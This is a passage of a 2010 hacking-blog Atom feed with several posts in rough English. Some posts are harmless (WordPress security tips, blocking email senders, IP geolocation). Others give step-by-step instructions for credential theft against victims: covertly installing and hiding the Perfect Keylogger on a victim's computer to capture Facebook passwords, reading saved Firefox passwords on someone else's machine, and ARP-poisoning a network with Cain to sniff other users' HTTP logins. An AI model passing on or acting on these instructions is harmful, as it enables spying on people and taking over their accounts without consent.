href='http://www.blogger.com/feeds/7130931598212594807/posts/default/6433501570696775474'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/05/check-your-website-for-dns-delegation.html' title='Check Your Website For DNS Delegation!'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Dctv9GCvTgs/S-Q3rPlEsvI/AAAAAAAAAY8/kVcSj_nPSRc/s72-c/dns-howto-1.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-1947817097371617876</id><published>2010-04-29T08:49:00.000-07:00</published><updated>2010-04-29T08:49:46.476-07:00</updated><title type='text'>Tips to Avoid Hacking Blog</title><content type='html'>Not infrequently a webmaster or blogger to feel worried in the hack, especially with the more popular a website, will be more often exposed and have the threat of hacking. To avoid this danger, here are some tips to secure your wordpress installation from hack attacks. &lt;br /&gt;Secure Database &lt;br /&gt;The first suggestion which I recommend is a secure database of your website or blog. The trick, make frequent backups of the database and frequent backups of data. You can do this via phpMyAdmin in the hosting account, or using plugins, like WP-Database Backup (http://wordpress.org/extend/plugins/wp-db-backup/). These plugins perform backup tasks easier. You only need to log into the WordPress admin panel and click a few links. These plugins should be owned by every blogger. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Scan WordPress &lt;br /&gt;After having a plugin that protect a database website, the &lt;span class="fullpost"&gt;next step is to scan to make sure the WordPress installation was not detected on the security gap. This task can be performed also by using a plugin called WP Security Scan (http://wordpress.org/extend/plugins/wp-security-scan/). With this plugin you can mengedintifikasi gap - if the security hole was found in the blog. In addition we will be told how to fix it. &lt;br /&gt;WP Security Scan plugins will also be offered for the change of name prefixes tables, testing the strength of passwords, delete the admin account and verify your blog directory to have good security. &lt;br /&gt;&lt;br /&gt;The intruder deterrent &lt;br /&gt;The intruder in this sense is a combination of letters, numbers and so forth trying to find the password. Even the biased Python script used to try to find the password you WordPress blog. &lt;br /&gt;It would be very easy for an intruder to find the password if you use a blog name or word that is predictable. Therefore, try using the correct password - really strong, using a combination of lowercase letters, numbers and special characters. You also take advantage of the bias generator in the WP Security Scan password to create a strong password. &lt;br /&gt;Although using a password that is juat a good trick, another way that will provide efficient protection for your blog, by adding the Apache Login form to the WP-Admin directory. Ask Apache (WP Security Scan) plugin allows you to protect your wp-admin directory its security level equivalent to the authentication server (htpasswd). This plugin allows you to disable hotlinking, or prevent direct access to the wp-content directory and wp-includes. &lt;br /&gt;&lt;br /&gt;Observe Plugins &lt;br /&gt;Not all plugins were good, some of them which is the eye - the eye to know the vulnerabilities inherent in your blog. For this reason, there is a need for you to hide the content directory / wp-content/plugins. The trick is to create an empty file named index.html, which is then uploaded into the directory wp-content/plugins &lt;br /&gt;&lt;br /&gt;WordPress version Hide &lt;br /&gt;If there is one security hole in certain versions of WP, a hacker only needs to display the source code of your blog on your browser and see if the version you are wearing a bias related to penetrate. By leaving the version of Meta, the bias is likely infiltrated your blog. To prevent this, delete the line in header.php in the theme you use. &lt;br /&gt;Similarly, there is also a plugin that allows you to trick on the version of WordPress you are wearing.&lt;br /&gt;   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-1947817097371617876?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/1947817097371617876/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/04/tips-to-avoid-hacking-blog.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1947817097371617876'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1947817097371617876'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/04/tips-to-avoid-hacking-blog.html' title='Tips to Avoid Hacking Blog'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5899084615381023600</id><published>2010-04-29T07:48:00.000-07:00</published><updated>2010-04-29T07:48:54.350-07:00</updated><title type='text'>Tips Hacking Facebook with Keylogger ?</title><content type='html'>How to Use Perfect Keylogger Hacking Facebook! already in the know Is Keylogger? who do not know read my previous post: &lt;br /&gt;What is a Keylogger? &lt;br /&gt;&lt;br /&gt;Articles like this has a lot to make, but even more that nyari, so I better make this article also unique by using the keyword "Using Facebook Hacking Tips Perfect keylogger" eventually becomes too! lha how else, it is very difficult for a hacker now, Facebook has gained an improved security system. Script2 not able to penetrate the defense facebook &lt;br /&gt;&lt;br /&gt;keylogger software is used for espionage activities &lt;span class="fullpost"&gt;against computer users. It also can make the password for facebook users know what the computer. How to Use Perfect Keylogger Hacking Facebook is to install keylogger software on computers that will become our spy. &lt;br /&gt;&lt;br /&gt;There are many types of keylogger software that we use is a keylogger old version, but no significant problems that can view facebook password. &lt;br /&gt;How to Hack Facebook Nge Using keylogger: &lt;br /&gt;&lt;br /&gt;- Download Perfect Keylogger Perfect Keylogger Please Download (search on google just yaa) &lt;br /&gt;hehehe. at 4shared too much. &lt;br /&gt;- If finished Download Perfect Keylogger WinRAR files first extract &lt;br /&gt;&lt;br /&gt;How to install: &lt;br /&gt;- Install the victim computer &lt;br /&gt;- Double-click the file bpk.exe &lt;br /&gt;&lt;br /&gt;Perfect Keylogger keyloggerPerfect &lt;br /&gt;&lt;br /&gt;- We use the trial version click Continue evaluation aja, if you want the full version please click on the Enter button and enter the registration code serial number that is included in the package. &lt;br /&gt;- After completing the installation icon appears in the lower right corner of the computer Perfect Keylogger Double-click the taskbar to bring it, otherwise right click and hide to hide the icons. &lt;br /&gt;- Perfect Keylogger is a view like this, every password typed letters and applications used will be stored in box display. &lt;br /&gt;&lt;br /&gt;Perfect Keylogger Hacking Facebook: keystrokes viewer &lt;br /&gt;&lt;br /&gt;- Now try to close the first application Perfect Keylogger, log into your Facebook. &lt;br /&gt;- Double-click the taskbar icon bottom right corner of the Perfect Keylogger computer. &lt;br /&gt;- See your Password caught on the display box. &lt;br /&gt;and happy hacking &lt;br /&gt;&lt;br /&gt;Note: All things about using this software becomes your responsibility. &lt;br /&gt;because this crime row&lt;br /&gt;   &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5899084615381023600?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5899084615381023600/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/04/tips-hacking-facebook-with-keylogger.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5899084615381023600'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5899084615381023600'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/04/tips-hacking-facebook-with-keylogger.html' title='Tips Hacking Facebook with Keylogger ?'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-4572811611527150132</id><published>2010-04-07T21:32:00.000-07:00</published><updated>2010-04-07T21:39:16.772-07:00</updated><title type='text'>Knowing Tips email accounts and passwords stored in Firefox browser</title><content type='html'>&lt;i&gt;Previously I had a post about how to steal usernames and passwords of others facebook fake login method, this method only works if the victim is trapped to make fake login to our login.&lt;/i&gt;&lt;br /&gt;This time aya want to discuss tips to know others username and password stored in Firefox browser. Why should firefox? because firefox is a browser's most popular and most widely used. This method is very useful if the target we have a company or personal laptop because in general we save (Remember) the &lt;span class="fullpost"&gt;password in the browser for reasons of convenience.&lt;br /&gt;&lt;b&gt;in the victim's computer, open mozilla&lt;/b&gt;&lt;br /&gt;&lt;b&gt;Select the Tools menu&gt; Options&lt;/b&gt;&lt;br /&gt; &lt;b&gt;In the Options window click the Security tab&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/S71c_RyY0MI/AAAAAAAAAYQ/1lc3bZRZ17c/s1600/20-03-2010+13-16-33.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 301px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/S71c_RyY0MI/AAAAAAAAAYQ/1lc3bZRZ17c/s400/20-03-2010+13-16-33.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5457620565619167426" /&gt;&lt;/a&gt;&lt;br /&gt; &lt;b&gt;Click the Saved Password&lt;/b&gt;&lt;br /&gt;&lt;b&gt;If the victim never save (remember) password and username in firefox it will show here.&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/S71dSHFVRXI/AAAAAAAAAYY/tH2bQijmNN8/s1600/20-03-2010+13-19-21.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 303px; height: 320px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/S71dSHFVRXI/AAAAAAAAAYY/tH2bQijmNN8/s400/20-03-2010+13-19-21.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5457620889163351410" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;Click the Show Password to see the password.&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/S71dhP0CbfI/AAAAAAAAAYg/eg_UualzSnM/s1600/20-03-2010+13-23-31.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 303px; height: 320px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/S71dhP0CbfI/AAAAAAAAAYg/eg_UualzSnM/s400/20-03-2010+13-23-31.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5457621149204770290" /&gt;&lt;/a&gt;&lt;br /&gt;Okay, you already know the username and password for your friend. Not only facebook is not it? You can even find all the usernames and passwords are never stored in the firefox browser, such as email accounts and so forth.&lt;br /&gt;Once again, science is just for a newbie like aya gan this. Sorry my friends that I've stolen his password. Yah sorry. Create temen-temen me, next time yah pake master password.&lt;br /&gt;&lt;br /&gt;Create-agan agan a senior already, yah ... please shared their knowledge do not just protest blogs of others. Emang Well this blog is far from complete, but I always try to give my best. Dimnfaatin with both his knowledge well. Do not be using that to steal passwords loe own best friend. Do not ever bro ..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-4572811611527150132?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/4572811611527150132/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/04/knowing-tips-email-accounts-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4572811611527150132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4572811611527150132'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/04/knowing-tips-email-accounts-and.html' title='Knowing Tips email accounts and passwords stored in Firefox browser'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Dctv9GCvTgs/S71c_RyY0MI/AAAAAAAAAYQ/1lc3bZRZ17c/s72-c/20-03-2010+13-16-33.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-5420512627110145283</id><published>2010-04-07T21:14:00.000-07:00</published><updated>2010-04-07T21:40:26.157-07:00</updated><title type='text'>Learning Becoming Hacker</title><content type='html'>&lt;b&gt;Hackers &lt;/b&gt;&lt;i&gt;with expertise can view &amp; fix weaknesses in the computer software; normally then published openly on the Internet for the system to become better. Unfortunately, few people take evil for evil use that information - they are usually called crackers. Basically the world of hackers and crackers are no different from the art world, here we are talking art Internet network security. &lt;/i&gt;&lt;br /&gt;&lt;b&gt;before you need to know your IP address used &gt;&lt;span class="fullpost"&gt;in command prompt (cmd).&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S71a23uco8I/AAAAAAAAAXY/Bt5kO_a6lA8/s1600/11.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 196px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S71a23uco8I/AAAAAAAAAXY/Bt5kO_a6lA8/s400/11.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5457618222161109954" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;after that, the program Cain, click start APR and start sniffer such as in the following figure.&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/S71bED9-7CI/AAAAAAAAAXg/vflGi7Wpya4/s1600/2.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 240px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/S71bED9-7CI/AAAAAAAAAXg/vflGi7Wpya4/s400/2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5457618448785796130" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;After that click snifing tab and then right click and select scan the MAC Address, view pictures:&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/S71bRLUKV0I/AAAAAAAAAXo/6VKqtWhGaX8/s1600/31.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 240px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/S71bRLUKV0I/AAAAAAAAAXo/6VKqtWhGaX8/s400/31.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5457618674096166722" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S71bYYhOSxI/AAAAAAAAAXw/CyEmMPzhUm4/s1600/41.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 240px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S71bYYhOSxI/AAAAAAAAAXw/CyEmMPzhUm4/s400/41.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5457618797899696914" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Click the ARP tab at the bottom, then click the plus sign "+" to add, it will exit the dialog box as shown below.&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S71bgtDlTXI/AAAAAAAAAX4/dE7BF4Opf7o/s1600/51.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 240px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S71bgtDlTXI/AAAAAAAAAX4/dE7BF4Opf7o/s400/51.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5457618940851473778" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;On the left box click on an IP server and right-click on the box IP the victim. Do it repeatedly to nge-hack all victims of an existing IP address.&lt;/b&gt;&lt;br /&gt;&lt;b&gt; Once completed, the process will be conducted on all IP poisoning victims.&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Dctv9GCvTgs/S71boY-k0WI/AAAAAAAAAYA/OOHxqT07pIo/s1600/6.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 240px;" src="http://1.bp.blogspot.com/_Dctv9GCvTgs/S71boY-k0WI/AAAAAAAAAYA/OOHxqT07pIo/s400/6.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5457619072900714850" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;For results, please click the password tab on the bottom and click on HTTP, see the picture,&lt;/b&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S71b3bL-KBI/AAAAAAAAAYI/954kYnRgu8A/s1600/7.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 240px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S71b3bL-KBI/AAAAAAAAAYI/954kYnRgu8A/s400/7.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5457619331191810066" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Reading Results:&lt;/h3&gt;&lt;br /&gt;&lt;br /&gt;    * Click Menu HTTP On the left sidebar.&lt;br /&gt;    * Note Column Client, make sure it's not your own IP address.&lt;br /&gt;    * Watch your Username and Password fields. Often we come across data that is not the password, you will mendampatkan password if the target login.&lt;br /&gt;&lt;br /&gt;Thank you my friends who commented and corrected this post.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5420512627110145283?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5420512627110145283/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/04/learning-becoming-hacker.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5420512627110145283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5420512627110145283'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/04/learning-becoming-hacker.html' title='&lt;h2&gt;Learning Becoming Hacker&lt;/h2&gt;'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_Dctv9GCvTgs/S71a23uco8I/AAAAAAAAAXY/Bt5kO_a6lA8/s72-c/11.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-4490417289649108636</id><published>2010-03-30T04:21:00.001-07:00</published><updated>2010-03-30T04:23:01.994-07:00</updated><title type='text'>How to Block Unwanted Emails</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/S7He2rlklAI/AAAAAAAAAW4/TJe7I1HeTyc/s1600/block_emails.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 200px; height: 199px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/S7He2rlklAI/AAAAAAAAAW4/TJe7I1HeTyc/s400/block_emails.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5454385654716994562" /&gt;&lt;/a&gt;&lt;br /&gt;Do you want to  block emails from your ex wife/husband? Do you want to block those annoying offers and newsletters that reach your inbox? Well here is a way to block all those unwanted and annoying emails that you do not want to see or read! With this trick you can block individual email address or the whole domain from which you do not want the emails to come from. Here are the step-by-step instructions to do this.&lt;br /&gt;&lt;br /&gt;For Gmail&lt;br /&gt;&lt;br /&gt;1. Login to your account&lt;br /&gt;&lt;br /&gt;2. At the top-right corner, click on Settings&lt;br /&gt;&lt;br /&gt;3. Under Settings, click on Filters&lt;br /&gt;&lt;br /&gt;4. You’ll now see an option “Create a new filter“, click on it&lt;br /&gt;&lt;br /&gt;5. Now in the From field enter the email address from which you do not want to receive the emails&lt;br /&gt;&lt;br /&gt;For ex. you may enter john@gmail .com in the From field to block all incoming emails from this address. However if you want to block the whole domain then use the following syntax: *@xyz.com. Now all the incoming emails from &lt;span class="fullpost"&gt;the domain xyz.com will be blocked.&lt;br /&gt;&lt;br /&gt;6. Click on Next Step, select the action you’d like to take on the blocked emails. You may select the option Delete it so that the blocked email is moved to trash. To unblock the email, all you need to do is just delete the filter that you’ve created.&lt;br /&gt;&lt;br /&gt;For Yahoo&lt;br /&gt;&lt;br /&gt;1. Login to your account&lt;br /&gt;&lt;br /&gt;2. At the top-right corner, click on Options&lt;br /&gt;&lt;br /&gt;3. A drop down menu appears, now click on More options&lt;br /&gt;&lt;br /&gt;4. In the left panel select the option Filters and click on create or edit filters&lt;br /&gt;&lt;br /&gt;5. Now click on Add&lt;br /&gt;&lt;br /&gt;6. In the next screen, give a name to your filter and in the From header field enter the email address that you want to block.&lt;br /&gt;&lt;br /&gt;Fox ex. john@gmail.com or if you want to block an entire domain then just enter @xyz.com. Dont enter *@xyz.com. Select the option Move the message to: Trash and click on Save Changes.&lt;br /&gt;&lt;br /&gt;For Hotmail&lt;br /&gt;&lt;br /&gt;1. Login to your account&lt;br /&gt;&lt;br /&gt;2. At the top-right corner, click on Options&lt;br /&gt;&lt;br /&gt;3. A drop down menu appears, now click on More options&lt;br /&gt;&lt;br /&gt;4. Click on Safe and blocked senders link under Junk e-mail&lt;br /&gt;&lt;br /&gt;5. Now click on Blocked senders&lt;br /&gt;&lt;br /&gt;6. Type in the email address that you want to block under blocked e-mail address or domain field.&lt;br /&gt;&lt;br /&gt;For ex. Enter john@yahoo.com to block the individual email address or just enter xyz.com to block the entire domain.&lt;br /&gt;&lt;br /&gt;That’s it. You no longer receive those annoying emails in your inbox. Keep your inbox clean and tidy. I hope this post helps. pass your comments!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-4490417289649108636?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/4490417289649108636/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/03/how-to-block-unwanted-emails.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4490417289649108636'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/4490417289649108636'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/03/how-to-block-unwanted-emails.html' title='How to Block Unwanted Emails'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Dctv9GCvTgs/S7He2rlklAI/AAAAAAAAAW4/TJe7I1HeTyc/s72-c/block_emails.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2088589765178744075</id><published>2010-03-30T04:18:00.001-07:00</published><updated>2010-03-30T04:20:22.308-07:00</updated><title type='text'>How to Trace Any IP Address</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Dctv9GCvTgs/S7HeRXY1M5I/AAAAAAAAAWo/SYOI7lQ2Ej0/s1600/ipmap1.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 283px; height: 180px;" src="http://2.bp.blogspot.com/_Dctv9GCvTgs/S7HeRXY1M5I/AAAAAAAAAWo/SYOI7lQ2Ej0/s400/ipmap1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5454385013639689106" /&gt;&lt;/a&gt;&lt;br /&gt;In my earlier post I had discussed about how to capture the IP address of a remote computer. Once you obtain this IP address it is necessary to trace it back to it’s source. So in this post I will show you how to trace any IP address back to it’s source. In fact tracing an IP address is very simple and easy than we think. There exists many websites through which you can trace any IP address back to it’s source. One of my favorite site is ip2location.com. Just go to http://www.ip2location.com/demo.aspx and enter the IP address that you want to trace in the dialog box and click on “Find Location”‘. With just a click of a button you can find the &lt;span class="fullpost"&gt;following information for any given IP address.&lt;br /&gt;&lt;br /&gt;1. Country in which the IP is located&lt;br /&gt;&lt;br /&gt;2. Region&lt;br /&gt;&lt;br /&gt;3. City&lt;br /&gt;&lt;br /&gt;4. Latitude/Longitude&lt;br /&gt;&lt;br /&gt;5. Zip Code&lt;br /&gt;&lt;br /&gt;6. Time Zone&lt;br /&gt;&lt;br /&gt;7. Name of the ISP&lt;br /&gt;&lt;br /&gt;8. Internet Speed&lt;br /&gt;&lt;br /&gt;9. Weather Station&lt;br /&gt;&lt;br /&gt;10. Area Code and&lt;br /&gt;&lt;br /&gt;11. Domain name associated with the IP address.&lt;br /&gt;&lt;br /&gt;A sample snapshot of the results from ip2location.com is given below&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Dctv9GCvTgs/S7HeXXZemhI/AAAAAAAAAWw/Xm9OqTqGoJQ/s1600/ip2location_results1.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 102px;" src="http://3.bp.blogspot.com/_Dctv9GCvTgs/S7HeXXZemhI/AAAAAAAAAWw/Xm9OqTqGoJQ/s400/ip2location_results1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5454385116721617426" /&gt;&lt;/a&gt;&lt;br /&gt;ip2location_results&lt;br /&gt;&lt;br /&gt;You can also visually trace route any IP address back to it’s location. For this just visit http://www.yougetsignal.com/tools/visual-tracert/ and enter the IP you want to trace in the dialog box and hit the “Proxy Trace” button. Wait for few seconds and the visual trace route tool displays the path Internet packets traverse to reach a specified destination. Hope this helps. Please pass you comments.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2088589765178744075?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2088589765178744075/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2010/03/how-to-trace-any-ip-address.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2088589765178744075'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2088589765178744075'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2010/03/how-to-trace-any-ip-address.html' title='How to Trace Any IP Address'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Dctv9GCvTgs/S7HeRXY1M5I/AAAAAAAAAWo/SYOI7lQ2Ej0/s72-c/ipmap1.jpg' height='72' 